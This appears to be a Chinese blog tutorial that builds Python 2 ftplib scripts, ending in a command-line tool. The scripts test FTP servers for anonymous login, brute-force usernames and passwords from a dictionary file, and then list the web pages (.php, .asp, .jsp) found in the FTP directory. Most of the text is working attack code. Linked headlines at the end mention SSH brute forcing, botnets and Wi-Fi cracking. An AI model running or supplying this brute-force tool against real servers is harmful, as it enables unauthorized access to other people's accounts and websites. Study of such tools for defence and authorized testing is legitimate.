目录

判断FTP服务器是否允许匿名登录

暴力破解FTP口令

列出FTP目录内的网页文件

综合

环境:Windows python2.7.15

ftplib模块是python下用于ftp服务的模块 。

判断FTP服务器是否允许匿名登录

以下代码是判断FTP服务器是否允许匿名登录

我们写了一个anonLogin() 函数,使用 ftp.login()方法进行匿名登录,如果没有抛出异常,说明FTP服务器允许匿名登录。反之不允许。

# -*- coding: utf-8 -*-

"""

Created on Sun Nov  4 10:25:17 2018

@author: 小谢

"""

import ftplib

def anonLogin(hostname):

    try:

        ftp=ftplib.FTP(hostname)       #实例化FTP连接

        ftp.login('anonymous','')      #匿名登录

        print '\n[*] '+hostname+' FTP Anonymous Login Succeeded!'

        ftp.quit()                    #退出FTP

        return True

    except Exception,e:               #如果捕获到异常,说明不允许匿名登录

        print '\n[-] '+str(hostname)+' FTP Anonymous Login Failed!'

        return False

anonLogin('127.0.0.1')

暴力破解FTP口令

如果ftp服务器不允许匿名登录呢,我们就需要通过密码字典暴力破解ftp口令。我们通过读取密码字典中的用户名和口令,一个一个去尝试登录,如果没捕获到异常,说明用户名和口令正确!密码字典中用户名和口令用 : 分隔。

# -*- coding: utf-8 -*-

"""

Created on Sun Nov  4 10:36:49 2018

@author: 小谢

"""

import ftplib

def bruteLogin(hostname,passwdFile):

    f=open(passwdFile,'r')

    lines=f.readlines()

    for line in lines:

        user=line.split(":")[0]    #用户名

        passwd=line.split(":")[1].strip("\n")  #密码

        print '[+] Trying: '+user+": "+passwd

        try:

            ftp=ftplib.FTP(hostname)          #实例化FTP连接

            ftp.login(user,passwd)            #登录

            print '\n[*] '+hostname +' FTP Login Succeeded!'

            ftp.quit()       #退出FTP

            return(user,passwd)      #返回用户名和密码

        except Exception,e:

            pass

    print '\n[-] Could not brute force FTP credentials!'

    return(None,None)

a=bruteLogin("127.0.0.1","key.txt")

print("User:%s Password:%s"%a)

列出FTP目录内的网页文件

在得到了用户名和口令之后,我们就可以列出FTP目录下的文件,看是否存在网页文件。注意,我们这里只能判断FTP目录这一级的文件,而不能递归的判断目录内的文件。因为我们只知道FTP目录的相对路径,而不知道绝对路径!

# -*- coding: utf-8 -*-

"""

Created on Sun Nov  4 10:51:13 2018

@author: 小谢

"""

import ftplib

import os

def returnDefault(ftp):

    try:

        dirList=ftp.nlst()   #列出FTP目录下的文件或目录

    except:

        dirList=[]

        print '[-] Could not list directory contents!'

        return

    retList=[]

    for filename in dirList:

        fn=filename.lower()        #将目录名转换为小写

        if '.php' in fn or '.html' in fn or '.asp' in fn or '.jsp' in fn or '.htm' in fn:

            print'[+] Found default page:'+filename

            retList.append(filename)

    return retList

def main():

    ftp=ftplib.FTP("127.0.0.1")   #实例化FTP连接

    ftp.login("admin","root")

    a=returnDefault(ftp)

    if a:

        print("Defalut Page List:")

        for i in a:

            print(i)

main()

综合

我们可以结合前面三个脚本,写一个汇总的脚本。当用户执行脚本的时候,没加 -F/-f 参数指定密码字典的时候,就默认查看FTP服务器是否可匿名登录,如果可匿名登录,则列出FTP目录下的网页文件。如果不能匿名登录,就提示不能匿名登录。当指定了-F/-f 参数的话,就暴力破解 FTP 口令,如果破解成功了,则列出FTP目录下是的网页文件。

# -*- coding: utf-8 -*-

"""

Created on Sun Nov  4 12:12:41 2018

@author: 小谢

"""

import parser

import optparse

import ftplib

def anonLogin(hostname):     #验证是否可匿名登录

    try:

        ftp=ftplib.FTP(hostname)

        ftp.login('','')  #匿名登录

        print '\n[*] '+hostname +' FTP Anonymous Login Succeeded!'

        return (True,ftp)

    except:

        print '\n[-] '+str(hostname)+' FTP Anonymous Login Failed!'

        return (False,ftp)

def bruteLogin(hostname,passwdFile):  #暴力破解

    f=open(passwdFile,'r')

    lines=f.readlines()

    for line in lines:

        user=line.split(":")[0]                #用户名

        passwd=line.split(":")[1].strip("\n")  #密码

        try:

            ftp=ftplib.FTP(hostname)

            ftp.login(user,passwd)

            print '\n[*] '+hostname +' FTP Login Succeeded!'

            print("User:%s Password:%s"%(user,passwd))

            return(True,ftp)

        except Exception,e:

            pass

    print '\n[-] Could not brute force FTP credentials!'

    return(False,ftp)

def returnDefault(ftp):     #列出FTP目录下的网页文件

    try:

        dirList=ftp.nlst()   #列出FTP目录下的文件或目录

    except Exception,e:

        print e

        print '[-] Could not list directory contents!'

        return

    retList=[]

    for filename in dirList:

        fn=filename.lower()        #将目录名转换为小写

        if '.php' in fn or '.html' in fn or '.asp' in fn or '.jsp' in fn or '.htm' in fn:

            print'[+] Found default page:'+filename

            retList.append(filename)

    return retList

def main():

    usage="python %prog -H <target host> -F/f <password file>"  #显示文件的用法帮助信息

    parser=optparse.OptionParser(usage)   #实例化一个对象

    parser.add_option('-H',dest='Host',type='string',help='target host')

    parser.add_option('-f','-F',dest='File',type='string',help='target host')

    (options,args)=parser.parse_args()

    Host=options.Host

    File=options.File

    if Host==None:

        print(parser.usage)

        exit(0)

    if File==None:

        a=anonLogin(Host)

        if a[0]:

            returnDefault(a[1])

    else:

        b=bruteLogin(Host,File)

        if b[0]:

            returnDefault(b[1])

    return

if __name__=="__main__":

    main()

Python脚本暴力破解FTP口令(ftplib)的更多相关文章

  1. Python脚本暴力破解SSH口令以及构建僵尸网络(pxssh)

    目录 暴力破解SSH口令 SSH远端执行命令 构建僵尸网络 环境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect库的ssh专用脚本,他能用预先写好的 ...

  2. [小技巧] Python 脚本暴力破解 HC2600 机顶盒管理密码

    家里最近接入了广电有线电视,配了三个创维 HC2600 机顶盒,并且每个机顶盒还带有无线路由器功能. 免费赠送 Internet 接入服务倒也没什么,不过机顶盒内置的 WIFI 实在有点寒酸:只支持 ...

  3. 暴力破解FTP服务器技术探讨与防范措施

    暴力破解FTP服务器技术探讨与防范措施 随着Internet的发展出现了由于大量傻瓜化黑客工具任何一种黑客攻击手段的门槛都降低了很多但是暴力破解法的工具制作都已经非常容易大家通常会认为暴力破解攻击只是 ...

  4. XAMPP、PHPstorm和PHPcharm和Windows环境下Python搭建+暴力破解

    XAMPP的安装和使用 一.什么是XAMPP? XAMPP是最流行的PHP开发环境. XAMPP是完全免费且易于安装的Apache发行版,其中包含Apache.MariaDB.PHP和Perl. 类似 ...

  5. Python脚本自动化破解大白鲨摄像头(Shodan)

    关于本文的技术知识点,Shodan模块的用法,传送门-->  Python中shadon模块的使用    Shodan的使用 今天我们要利用python进行自动化破解的摄像头叫大白鲨摄像头,他的 ...

  6. Python最新暴力破解WiFi,攻破所有密码限制,最强破解!

    暴力破解wifi密码 这个代码也是非常简单,这里需要用Python中的pywifi这个库,所以需要在DOS命令下安装这个库,同样使用pip install pywifi,很简单就安装成功了,我用的是P ...

  7. python 编写暴力破解mysql用户名密码

    本文摘自别人的,自己运行调试了一下#!/user/bin/env python#-*- coding:utf-8 -*- import pymysql#导入连接数据库的模块import sys cla ...

  8. Fast RDP Brute暴力破解3389口令

    http://www.tuicool.com/articles/b67rQfr 下载地址:https://www.rekings.com/fast-rdp-brute-gui-v2-0/

  9. python实现暴力破解

    import urllib2 import urllib import cookielib import threading import sys import Queue from HTMLPars ...

随机推荐

  1. Java的特性和优势以及不同版本的分类,jdk,jre,jvm的联系与区别,javadoc的生成

    Java 1.Java的特性和优势 Write Once,Run Anywhere 简单性 面向对象 可移植性 高性能 分布式 动态性 多线程 安全性 健壮性 2.Java的三大版本 JavaSE:标 ...

  2. python学习总结篇(2)——函数

    如其他语言一样,除了基本知识外,另外一个重要的板块就是函数了,python中也有函数. 在python中,函数的定义方式为: def   函数名( ): 下面通过几个简单的例子,看看python中的函 ...

  3. JavaCV 树莓派打造监控系统平台

    使用树莓派搭建视频监控平台去年就简单的实现了,只不过功能比较简陋,最近抽时间重构了原来的平台. 环境搭建 环境部分,参考旧版的安装及配置: 树莓派搭建视频监控平台 树莓派视频监控平台实现录制归档 框架 ...

  4. 解析分布式应用框架Ray架构源码

    摘要:Ray的定位是分布式应用框架,主要目标是使能分布式应用的开发和运行. Ray是UC Berkeley大学 RISE lab(前AMP lab) 2017年12月 开源的新一代分布式应用框架(刚发 ...

  5. pwnable.kr第二题collision

    1 col@prowl:~$ ls -al 2 total 36 3 drwxr-x--- 5 root col 4096 Oct 23 2016 . 4 drwxr-xr-x 114 root ro ...

  6. 使用C# (.NET Core) 实现观察者模式 (Observer Pattern) 并介绍 delegate 和 event

    观察者模式 这里面综合了几本书的资料. 需求 有这么个项目: 需求是这样的: 一个气象站, 有三个传感器(温度, 湿度, 气压), 有一个WeatherData对象, 它能从气象站获得这三个数据. 还 ...

  7. Java单链表反转图文详解

    Java单链表反转图文详解 最近在回顾链表反转问题中,突然有一些新的发现和收获,特此整理一下,与大家分享 背景回顾 单链表的存储结构如图: 数据域存放数据元素,指针域存放后继结点地址 我们以一条 N1 ...

  8. 敏捷史话(十一):敏捷宣言“间谍”——Steve Mellor

    Steve Mellor 是敏捷宣言的签署人之一,他自称是作为" 间谍"去参加雪鸟会议的. 起初收到会议邀请时,Steve 非常惊讶,因为他所做的工作一直都是关于建模方面的,很少将 ...

  9. 从零玩转SpringSecurity+JWT整合前后端分离

    从零玩转SpringSecurity+JWT整合前后端分离 2021年4月9日 · 预计阅读时间: 50 分钟 一.什么是Jwt? Json web token (JWT), 是为了在网络应用环境间传 ...

  10. 可读性友好的JavaScript:两个专家的故事

    每个人都想成为专家,但什么才是专家呢?这些年来,我见过两种被称为"专家"的人.专家一是指对语言中的每一个工具都了如指掌的人,而且无论是否有帮助,都一定要用好每一点.专家二也知道每一 ...